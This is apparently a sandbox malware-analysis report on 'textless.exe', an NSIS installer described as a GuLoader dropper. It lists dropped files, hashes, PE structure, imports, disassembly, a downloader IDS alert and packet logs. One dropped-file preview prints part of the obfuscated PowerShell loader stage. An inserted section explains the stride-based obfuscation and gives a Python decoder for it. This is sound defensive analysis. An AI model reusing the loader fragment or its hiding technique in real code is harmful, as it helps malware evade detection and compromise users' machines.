Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...y.TS...I..0.S.J@..*.7.G.p...7.. 4.j0i.X.i.Z.RgT&..KM..5....(ZL.KS...O..!j...i*....@.$w..IL-Q.V....+=F..i5.G$.p&.ny......f..d.f.4...c.(....L.K.....Pj..&..5.4..%..-34..C....4S.Q.1F(......C...I...DDSMJG.0....i.!..h.2)1Rb....)@......Zn)...(....v..J.;5..7..)4.....jb.Z.$SK..P!.......\...uG..u...7R...Rf......34..q.8.i4f.4.R.RQIJ.QE.\|.QE..(..4.Qq.IK.1J.r.4S.F(.Q.S

Process:C:\Users\user\Desktop\textless.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):238
Entropy (8bit):4.650033481879272
Encrypted:false
SSDEEP:6:3MXfLWtAJWKdAZXEmvySvuiAWAVZ0evPWhyIGFhenMmJtc12oan:cXIAndApdLvuizAVeWPWhyIGfaCan
MD5:20E81A81FC8DBE56A8D7D364E928C500
SHA1:4B9B7F0C641ADAC095D1514CF577037C04F02AB4
SHA-256:A0C87FECB84E9F2724B64805BAD60D1A7D7669AEB591FB8A000FA3E4DB5027CD
SHA-512:F9BFFC80201DFCF3A71E3446460D1686648AF754E2C5A5F489ECC12D58393A128E052E38D42F22822E836E43402E36871FA8585D83CE7CD5510ACA8992715ABA
Malicious:false
Preview:Hospitalsindlggendes infiltreringens regosols brges redroot dragere gemmel......[SUPPLERET SUPERMARKED]........;lactescense optrvlingers ella uigendriveligt harnisks,standardrutiners tvetullerne propped equiaxial fliglben barokstils......

Process:C:\Users\user\Desktop\textless.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):448
Entropy (8bit):4.339266955839172
Encrypted:false
SSDEEP:6:CEEl4NlCKAO6noRPEcJzxE03EX9IuvCKo05o8wfYJWOfJWWir/c7Fk8Sne0i:Ctl4CqB3d3EX9drtuFYJW3QTSev
MD5:86BEFA7A80190B17A5D263CB67CABF56
SHA1:BBF927E6B94BB210584FDEAF4072264717A75241
SHA-256:D5D85933FCF4D18AEA5B2F36BD0C087C279827F5A5C7E4486F7CBCDD6AA4E158
SHA-512:FC39E26DCE97D2B4CCA84B32CBE2AD823DF3C910A44CA68D4BCB0BCD9B2172CC95BE5808019BECCA9B337D160085C0A73DD0C5E701AB57C4F28B8417F740925C
Malicious:false
Preview:......;entraps bookit aabningstaler gels willedness biographises bverlamspelsene.Tracerteknikker lokalplanlgningernes pligtmenneskets bldgrere tilelike makuleret kapningernes..astragali overgangsbestemmelsers askesis udskylningen slaamaskinen.Indtaegt metavidenskab asuang shuckings..jaets kerve arizonite,superlaryngeally symptomise nonteminalen..;hjemmefdning bevikling handicrafters barenecked derfra witjar kurist,modetegner stmagter atonic....

Process:C:\Users\user\Desktop\textless.exe
File Type:data
Category:dropped
Size (bytes):137003
Entropy (8bit):1.2600579103434955
Encrypted:false
SSDEEP:3072:uKbwmcqCZm6iSGPcUXjGbjGUrM4g7Rl6YU360:zty80
MD5:CD7A4998B070AE1001296759049A525C
SHA1:C338E0DE9A9A533D5FFC6AE8494D84BDEA8A411C
SHA-256:BBCFADD87CF92C51FFE7BDEA5F2E025E16CAD3BCDEE331293EC5C925BD23956F
SHA-512:00756122FF5ACB5BF47181847BF32962F7B6076C04B64F326CE48F6B7C5FC93C15809AB8D3EFEB67BD6E52D77C7EBFDF5AB8FB742B0D3D7840AAD63AAB983C1C
Malicious:false
Preview:....@.......................................................................................%...............j.........................................................................0...............................................#.........%............................................................................................................<......................................................................................#..#........7........*...............................d................................................................................................M....I......I..............................|........................p.................-........................9.......0.........p.........<................,...........................'.........................................................................................................................E................................................................................

Process:C:\Users\user\Desktop\textless.exe
File Type:data
Category:dropped
Size (bytes):72519
Entropy (8bit):1.2387524314484188
Encrypted:false
SSDEEP:768:SdEY131pbEUmrewkV9ctzrG7VMIR+ephQF9gar:SR1FpYUOkbcBWV5UephQF3
MD5:7F0CD3FC131454E3BE7C008F0D57CC74
SHA1:F7372E8B267C4BE1CEF645C6EA6B458FD6A0F84F
SHA-256:D2215E2114436DB47D0AEE954F0565A8555489C91961458D8D4F70778F9B72EC
SHA-512:152ADBC7546240D65F202C88AE96B5FBDFF98E2D0DA071205DD3549FB8B882F4AE163A2E20DE9C49867F590940F611375E9E04673E11F375B74D6659E0AF2B96
Malicious:false
Preview:yy.y.yyyyyyy.yy.y*yyyyyy.yy.yyyyyyyyyyyyyyyoyyyyyyyy.yyyyyyyyy.yyyy.yyyy.yyyyyyyyy.yyyyyryyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyynyyyyyyyyyyyyyyyyyyyyyyyyyyyyyFyyyyyyyyyyyyyyyyyyyyyyyyyyyy.yyyyyyyyyy.yy$.yyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyyy.yy1yyyyyyyyyyyFyyyyyyyyyyyyyyyyyyyjyjyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyy#yyyyyyyyy.y.yyyyyyyyyyyyyyyyyyyyyyyy.yyy.yyyyyyyyyyyyyyyyyyyoyyyyyyyyyyyyyyyyyy.yyyyyyyy.yyyyyyyyyyyyyyyyyy.yyyy*yyyyyyyyylyyyyyyyyyyyyyyyyyyCyyyyyyyyy\yyyyyyyyyyyyyyyyyyy.yyyyyyyy.yyyyyyyy.yymyyyy.yy.yyyyyyy.yyyyyyyyyyyyyyyyyy^yyyyyyyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyydyyQ.yyyyyyVyyyyyyy0yyyyyyy.yyyy3yyyyyyyyy.y.y.yyyyyy#yyyyyyyy`yyyyyyyyyyyy.yyyyyyyyyy[yYyyyyyy.yyyyyyyyyyyyyyyyyyyyy..yyyy...yy.yyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyy]yyyyyyyyyyyyyyyyy.yyyyyyyy^yyyyyyyyyyyyyy.yyyyyyyyyyyyyyyyyyyyyyyyyyyyyy..yyyyyyyyyyyyyyyyyyyyyyyyyyyyeAyyy.yy.yyyy.yyyyyyyyyyy#y.yyyyayyyyyyyyyyyyyyyyyyyyyyyyyyyyy..y.yyyyyytyyy.yyyyyyyyyyyyyyy.yg.yyyyyyyyyyyyyyyyyyyyyyyyyyyyy:y.y*yy

Process:C:\Users\user\Desktop\textless.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):287
Entropy (8bit):4.336041032067111
Encrypted:false
SSDEEP:6:fm3IxZWR4yEGSD7VrOavIWEZbSEtL7lrQXQKfK6pPWFEfv:OYxYtEGSDhOavIb8CLpYL7phH
MD5:48B038CB1F14E0CA6216EB477C067408
SHA1:C98C0F9A1F16915BB059AA669550FAD3BA6524B7
SHA-256:FD1F8E9AC351D575369FDA7517CE61DD2043020AE1F7B9A8CBA005FB23D56758
SHA-512:2965FB40411840CA6E6CFD7B585EE78BED502216318959980E0CA299DFAAE6B50B5A7AD65DBDEC52141FC1C07D1FB7433BCAE94F73473238D78BEE81218D9E76
Malicious:false
Preview:..........ariadnetraades skulptureres laparotomize.Taposa mutinado runcinate kittlest slagtende finlandssvensker eftertnksomhed boldtrers pygobranchiate ramekin......;opstramninger disshroud typewrited kreaturerne.Socialbedragerierne tappestederne kanonfotografens moralism seams sudle..

Process:C:\Users\user\Desktop\textless.exe
File Type:Unicode text, UTF-8 text, with very long lines (3239), with CRLF, LF line terminators
Category:dropped
Size (bytes):54689
Entropy (8bit):5.352681396723301
Encrypted:false
SSDEEP:1536:xKtMqBub7OlyQqx0NeGC9NdnYN8X0kkfbOD52srf8S92M:x/qBtlbqxmeGC9N+8XgzmMsT8K2M
MD5:0D15C99B57AED3D01C2DC077A82D8E5A
SHA1:ABA0BE4F62421CFBF555D62C3BC3C31A14C47913
SHA-256:9F54593C7E2EB02ACC0828279307D81D539AA26C8CE25D2DD4869304C914151F
SHA-512:FFD5D7E840570A2F8960B84B8B03967C5CDED9BC3B206B8C6CEDB992C1DC1EBB63D73A859305A822106C5F389D4D199D968328843F3319961A50E2043E6A4C47
Malicious:false
Preview:$stodderprinss=$chemosynthesis;........$Beboss = @'. Kopp.Deple$Talj FSkattlTogsuu A punI,dtakSpeelyAtheih FikhoPronaoSlammdBarse=dsl s$YelpeS atact Myo,rSparraAm,asnPost datt nf B,lcoDiskegsche eGyntedGroveeSpittnTj nes.xcus; lan.ParadfRibbouHee fnSaligcFjerktGatepi MadgoEgnsunra do B adlRS opmo Dre,tStoletWelcoeHawfihSldera SporlBrus eAmbusrAktio Aliba(Arbe,$MisgoTO ciluUdbydf ta ms RedntBrokbe ,estnLilleeindrinDunhas Afid,Prepo$RaadnKCountoIsophrBesmir S naeGl,besUnderpMottooCrotanArc edMuh masnap.nPardncRhetteOphiokProcooindfarSancttMelaseSamletFodin)Naadi kvi {Monem.Knort.Erobr$ DrisVFrplaaClivbrSectilB rrea C lo Made (fr kvJS.ntaaHis.otErgoneInt ro SmalrHautehEpic iFlammzCataciHjtidnMoxie Kutt' ,oleU tatidOm.typsprucaContrnS yph$ConjuOMac osInvest SeedeLdepooTo beTZon,i AadseSOrthok eskioQuerel SpriuPostf TobakSAppormSimplkNorskfCoh ifStap TVarmeuAntitb.eargeBlommnSt.arsHebraTFolkerudty l Brikl kom BuskptBesigSEntreyDiscid BoyddStal.i nglne MuldG PererAper,aPedat MusetaL.str

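The 54 KB UTF-8 drop above is the GuLoader PowerShell stage: a here-string (`$Beboss = @'`) whose body is word-like filler with the real script's characters placed at a fixed stride, so that reading every N-th character from the right offset yields readable PowerShell (the visible fragment resolves to a `function ... ($..., $...)` declaration) while the file itself looks like dictionary junk to string scanners. The code that strips the filler sits later in the file and is not in the preview, so the decoder below is an added example, not code from the sample or from Joe Sandbox: it builds a constructed imitation of the layout (stride and offset are the example's own choices), pulls the here-string body out, and brute-forces stride and offset by scoring each candidate for PowerShell-ness.

```python
import random
import re
import string

# Constructed stand-in for the real loader script: NOT the decoded content of the dropped file.
SCRIPT = ("function Invoke-Stage ($Blob,$Key) { "
          "$Bytes = [Convert]::FromBase64String($Blob); return $Bytes }")

JUNK_ALPHABET = string.ascii_letters + "   ,."  # word-like filler, as in the real sample


def interleave(script: str, stride: int, offset: int, seed: int = 7) -> str:
    """Hide `script` so its characters sit at indices offset, offset+stride, ...
    with filler everywhere else (an imitation of the GuLoader layout)."""
    rng = random.Random(seed)
    junk = lambda n: "".join(rng.choice(JUNK_ALPHABET) for _ in range(n))
    return junk(offset) + "".join(ch + junk(stride - 1) for ch in script)


def wrap_here_string(var: str, body: str) -> str:
    """Mimic the `$name = @' ... '@` here-string wrapper seen in the preview."""
    return f"${var} = @'\r\n{body}\r\n'@\r\n"


def extract_here_string(text: str) -> str:
    """Return the body of the first single-quoted here-string in `text`."""
    m = re.search(r"@'\r?\n(.*?)\r?\n'@", text, re.DOTALL)
    if not m:
        raise ValueError("no here-string found")
    return m.group(1)


def deinterleave(blob: str, stride: int, offset: int) -> str:
    """The whole decoding step: keep every stride-th character from offset."""
    return blob[offset::stride]


KEYWORDS = ("function", "param", "return", "foreach", "while",
            "Convert", "Invoke", "Add-Type", "-join", "New-Object")
SIGILS = set("${}()[]=;")


def score(candidate: str) -> int:
    """Higher means 'looks like PowerShell'. Keyword hits dominate so that a
    divisor of the true stride (which keeps every sigil but breaks every word)
    cannot win on sigils alone. Real filler is built from dictionary words, so
    on live samples tighten KEYWORDS to tokens the filler is unlikely to carry."""
    kw = sum(candidate.count(k) for k in KEYWORDS)
    sig = sum(1 for ch in candidate if ch in SIGILS)
    return 10 * kw + sig


def auto_detect(blob: str, max_stride: int = 12):
    """Try every (stride, offset) pair and return the best-scoring decode."""
    best = (0, 1, 0, blob)
    for stride in range(1, max_stride + 1):
        for offset in range(stride):
            cand = deinterleave(blob, stride, offset)
            s = score(cand)
            if s > best[0]:
                best = (s, stride, offset, cand)
    _, stride, offset, cand = best
    return stride, offset, cand


def build_sample() -> str:
    """Constructed drop: SCRIPT hidden at stride 6, offset 4, inside a here-string."""
    return wrap_here_string("Beboss", interleave(SCRIPT, stride=6, offset=4))


if __name__ == "__main__":
    stride, offset, recovered = auto_detect(extract_here_string(build_sample()))
    print(f"stride={stride} offset={offset}\n{recovered}")
```

On a real drop the same loop is the first thing to try before reading the de-obfuscation routine by hand: the recovered text is usually a second, still-obfuscated PowerShell stage (string reversal, `-join`, and Win32 API resolution for the shellcode loader), so feed the output back through the same tooling rather than treating it as final.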
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.675891095317541
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:textless.exe
                                                                                            File size:621'676 bytes
                                                                                            MD5:9e8270179f04d867463a09af7ee36e32
                                                                                            SHA1:e32b5ff6d109b529112f35c8f639fbb1bb5f4986
                                                                                            SHA256:cc357e0c0d1b4b0c9cdaaa2f7fd530c7fcee6c62136462c1533d50971f97d976
                                                                                            SHA512:8d6bc637fe29007211bd9cccc84b64c5dbfcc9083cb9097e2427e32e2de4d6d957928184717ee2b4feba9a75631d87747639da74682c65e82922d715c1f627b7
                                                                                            SSDEEP:12288:JowisraETWNMHwQsNNG14vkM46P/wyeqwvcinEFAKSN+qq/9lX97:Jow/ra8WKQlM14h46P/wAYSLqq/7X97
                                                                                            TLSH:70D401FD2BC0AD1BC0E09E7164A767EB73659E1F6349574FE332B75C2A721A3180508A
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........
                                                                                            Icon Hash:1761ccccce9a6b0f
                                                                                            Entrypoint:0x40322b
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:4f67aeda01a0484282e8c59006b0b352
                                                                                            Instruction
                                                                                            sub esp, 00000184h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            xor ebx, ebx
                                                                                            push 00008001h
                                                                                            mov dword ptr [esp+18h], ebx
                                                                                            mov dword ptr [esp+10h], 00409130h
                                                                                            mov dword ptr [esp+20h], ebx
                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                            call dword ptr [00407120h]
                                                                                            call dword ptr [004070ACh]
                                                                                            cmp ax, 00000006h
                                                                                            je 00007F1FD9107523h
                                                                                            push ebx
                                                                                            call 00007F1FD910A4A9h
                                                                                            cmp eax, ebx
                                                                                            je 00007F1FD9107519h
                                                                                            push 00000C00h
                                                                                            call eax
                                                                                            mov esi, 00407298h
                                                                                            push esi
                                                                                            call 00007F1FD910A425h
                                                                                            push esi
                                                                                            call dword ptr [004070A8h]
                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                            cmp byte ptr [esi], bl
                                                                                            jne 00007F1FD91074FDh
                                                                                            push ebp
                                                                                            push 00000009h
                                                                                            call 00007F1FD910A47Ch
                                                                                            push 00000007h
                                                                                            call 00007F1FD910A475h
                                                                                            mov dword ptr [00423724h], eax
                                                                                            call dword ptr [00407044h]
                                                                                            push ebx
                                                                                            call dword ptr [00407288h]
                                                                                            mov dword ptr [004237D8h], eax
                                                                                            push ebx
                                                                                            lea eax, dword ptr [esp+38h]
                                                                                            push 00000160h
                                                                                            push eax
                                                                                            push ebx
                                                                                            push 0041ECF0h
                                                                                            call dword ptr [00407174h]
                                                                                            push 004091ECh
                                                                                            push 00422F20h
                                                                                            call 00007F1FD910A09Fh
                                                                                            call dword ptr [004070A4h]
                                                                                            mov ebp, 00429000h
                                                                                            push eax
                                                                                            push ebp
                                                                                            call 00007F1FD910A08Dh
                                                                                            push ebx
                                                                                            call dword ptr [00407154h]
                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7428 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x33000 | 0x28560 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5dc5 | 0x5e00 | 566b191b40fde4369ae73a05b57df1d2 | False | 0.6685089760638298 | data | 6.47110609300208 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1246 | 0x1400 | 6389f916226544852e494114faf192ad | False | 0.4271484375 | data | 5.0003960999706765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a818 | 0x400 | 72dcd89e8824ae186467be61797ed81e | False | 0.6474609375 | data | 5.220595003364983 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0xf000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x33000 | 0x28560 | 0x28600 | 740291f8cbb068f1d5cf95ecc518480e | False | 0.5544456269349846 | data | 6.273994471716261 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x33358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.5137229386016798
RT_ICON | 0x43b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.560752575152407
RT_ICON | 0x4d028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | English | United States | 0.5963031423290204
RT_ICON | 0x524b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.608171941426547
RT_ICON | 0x566d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.6493775933609959
RT_ICON | 0x58c80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.7178705440900562
RT_ICON | 0x59d28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.7561475409836066
RT_ICON | 0x5a6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.7872340425531915
RT_DIALOG | 0x5ab18 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5ac18 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5ad38 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x5ae00 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5ae60 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0x5aed8 | 0x348 | data | English | United States | 0.4845238095238095
RT_MANIFEST | 0x5b220 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153
DLL | Import
KERNEL32.dll | CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Description | Data
Comments | upthunder skkestols amoebaea
CompanyName | sexiness phytophenology ergoterapeuters
FileDescription | paleostriatum provokingness subdeans
FileVersion | 3.5.0.0
LegalCopyright | henliggefrist
OriginalFilename | immensest autoecic.exe
ProductName | maskinpark
ProductVersion | 3.5.0.0
Translation | 0x0409 0x04e4
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-10T11:24:30.451932+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49692 | 216.58.212.142 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                            Mar 10, 2025 11:24:35.596774101 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.596824884 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.602514029 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.602579117 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.602585077 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.602636099 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.638607979 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.638688087 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.638720989 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.638776064 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.642422915 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.642477036 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.642483950 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.642539024 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.647665024 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.647727013 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.647804022 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.647862911 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.653832912 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.653888941 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.653896093 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.653951883 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.653956890 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.654004097 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.661319971 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.661479950 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.661499977 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.661551952 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.694760084 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.694922924 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.694931984 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.694983006 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.698262930 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.698322058 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.698328972 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.698389053 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.705826998 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.705888987 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.706207991 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.706259012 CET49693443192.168.2.7142.250.185.97
                                                                                            Mar 10, 2025 11:24:35.736253023 CET44349693142.250.185.97192.168.2.7
                                                                                            Mar 10, 2025 11:24:35.736368895 CET44349693142.250.185.97192.168.2.7
